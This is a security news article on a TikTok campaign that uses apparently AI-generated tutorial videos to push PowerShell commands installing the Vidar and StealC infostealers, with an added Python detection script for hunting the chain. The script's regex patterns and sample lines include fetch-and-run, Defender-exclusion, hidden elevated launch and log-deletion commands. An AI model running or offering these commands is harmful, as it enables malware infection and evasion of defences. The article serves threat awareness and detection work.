
The infection chain of the campaigns that lead to the Vidar and StealC malware | Image: Trend Micro
Trend Micro reveals a growing threat on TikTok, where AI-generated videos deceive users into running malicious PowerShell commands — exposing them to potent information-stealing malware.
In a recent exposé, Trend Micro uncovered a dangerous social engineering campaign that hijacks TikTok’s viral platform to distribute Vidar and StealC, two sophisticated information-stealing malware families. By leveraging AI-generated content and exploiting user trust, cybercriminals are transforming innocent video tutorials into vectors for malware.
“This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps,” the report explains.
The campaign begins with TikTok accounts like @gitallowed, @zane.houghton, and @sysglow.wow sharing faceless tutorial videos that instruct viewers to activate software like Windows, Spotify, or CapCut. These videos, some garnering over half a million views, show step-by-step “activation” instructions that culminate in a PowerShell command like:
“The videos instruct viewers to run a sequence of commands… The instructional voice also appears AI-generated, reinforcing the likelihood that AI tools are being used to produce these videos,” noted Trend Micro.
The command downloads and executes a remote script, initiating a malware dropper chain that is both stealthy and persistent.
Here’s a breakdown of how the attack unfolds:
- Users execute PowerShell commands directly after watching the TikTok video.
- A remote script from hxxps://allaivo[.]me/spotify is downloaded and run.
- Hidden directories are created in APPDATA and LOCALAPPDATA, and added to Windows Defender’s exclusion list.
- A secondary payload is downloaded — typically Vidar or StealC from hxxps://amssh[.]co/file.exe.
- A final persistence script is fetched from hxxps://amssh[.]co/script.ps1, enabling the malware to survive reboots.
- Logs and temp folders are deleted to obscure forensic evidence.
“The script employs retry logic to ensure that the payload is downloaded successfully, and then launches the malware executable as a hidden, elevated process,” Trend Micro warns.
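To hunt for this chain in PowerShell script-block logging (Event ID 4104), the following added example (not from the Trend Micro report) maps each behaviour described above to a generic PowerShell idiom and correlates matches per host, since the chain is spread across several script blocks. The regex patterns, host names and sample script blocks are constructed assumptions for illustration, not the campaign's actual script.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set

# One generic PowerShell idiom per behaviour reported for the dropper chain.
# Patterns are illustrative assumptions; the article does not quote the script.
INDICATORS: Dict[str, re.Pattern] = {
    "remote_script_exec": re.compile(            # the pasted one-liner
        r"\b(iex|invoke-expression)\b.*\b(irm|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I),
    "defender_exclusion": re.compile(r"\badd-mppreference\b.*-exclusionpath\b", re.I),
    "hidden_dir_appdata": re.compile(            # hidden dir under (LOCAL)APPDATA
        r"(\$env:(local)?appdata|%(local)?appdata%).*"
        r"(attrib\s+\+h|attributes\s*\+?=\s*['\"]?hidden|fileattributes\]::hidden)", re.I),
    "payload_download": re.compile(              # file.exe / script.ps1 fetch
        r"\b(invoke-webrequest|iwr|irm|downloadfile)\b.*\.(exe|ps1)\b", re.I),
    "hidden_elevated_process": re.compile(       # hidden, elevated launch
        r"\bstart-process\b(?=.*-windowstyle\s+hidden)(?=.*-verb\s+runas)", re.I),
    "log_cleanup": re.compile(r"\bremove-item\b.*(\$env:temp|\\temp\\|\blogs?\b)", re.I),
}

def match_indicators(script_block: str) -> List[str]:
    """Names of every behaviour pattern found in one ScriptBlockText value."""
    return [name for name, rx in INDICATORS.items() if rx.search(script_block)]

def triage(events: Iterable[dict]) -> Dict[str, Set[str]]:
    """Aggregate indicators per host: the chain is spread over several script
    blocks, so a rule that looks at one event at a time misses most of it."""
    per_host: Dict[str, Set[str]] = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(match_indicators(ev["text"]))
    return dict(per_host)

def is_suspicious(found: Set[str]) -> bool:
    """Alert on the user-pasted one-liner alone, or on any two chained behaviours."""
    return "remote_script_exec" in found or len(found) >= 2

# Constructed Event ID 4104 ScriptBlockText samples, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "text": "iex (irm https://example.invalid/spotify)"},
    {"host": "ws01", "text": "$d=\"$env:APPDATA\\svc\"; New-Item -ItemType Directory $d | Out-Null; "
                             "(Get-Item $d).Attributes += 'Hidden'; Add-MpPreference -ExclusionPath $d, $env:LOCALAPPDATA"},
    {"host": "ws01", "text": "Invoke-WebRequest https://example.invalid/file.exe -OutFile \"$d\\file.exe\"; "
                             "Start-Process \"$d\\file.exe\" -WindowStyle Hidden -Verb RunAs; Remove-Item \"$env:TEMP\\*\" -Recurse -Force"},
    {"host": "ws02", "text": "Get-ChildItem $env:APPDATA | Where-Object Name -like 'Code*'"},  # benign
]
if __name__ == "__main__":
    for host, found in triage(SAMPLE_EVENTS).items():
        print(host, "SUSPICIOUS" if is_suspicious(found) else "clean", sorted(found))
```

Feeding real 4104 events into `triage` requires script-block logging to be enabled; the per-host threshold is a starting point to tune against your own admin activity.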
Once active, the malware communicates with its C&C servers using novel evasion techniques:
- Vidar uses platforms like Steam and Telegram as Dead Drop Resolvers (DDR), hiding real server addresses in profile metadata.
- StealC connects directly to IP-based endpoints like 91[.]92[.]46[.]70.
“Vidar, in particular, abuses legitimate services like Steam and Telegram to serve as Dead Drop Resolvers,” the researchers state.
The abuse of TikTok’s algorithmic amplification, combined with AI-generated deception, marks a new era in malware delivery. As Trend Micro emphasizes: “The use of AI-generated content also elevates these kinds of attacks from isolated incidents to a highly scalable operation.”